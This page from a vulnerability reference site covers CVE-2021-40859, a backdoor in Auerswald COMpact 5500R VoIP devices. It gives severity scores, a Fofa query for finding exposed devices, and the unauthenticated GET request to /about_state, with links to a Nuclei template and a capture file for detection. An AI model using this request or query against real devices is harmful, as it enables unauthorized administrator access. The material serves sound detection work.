🔙 목록으로 돌아가기

CVE-2021-40859: Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor

TitleAuerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor
Authorpussycat0x
SeverityCritical
ImpactUnauthenticated attackers can gain unauthorized access to affected devices.
RemediationApply the latest firmware update provided by Auerswald to fix the backdoor vulnerability.
CVSS Score9.8
EPSS Score0.81279
CVE IDCVE-2021-40859
Fofa Query"auerswald"
Tags cve2021 cve iot unauth voip auerswald vuln

🔍 Vulnerability Description

Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint (“https://192.168.1[.]2/about_state”), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.

🌐 HTTP Request

GET /about_state HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-40859.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-40859.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A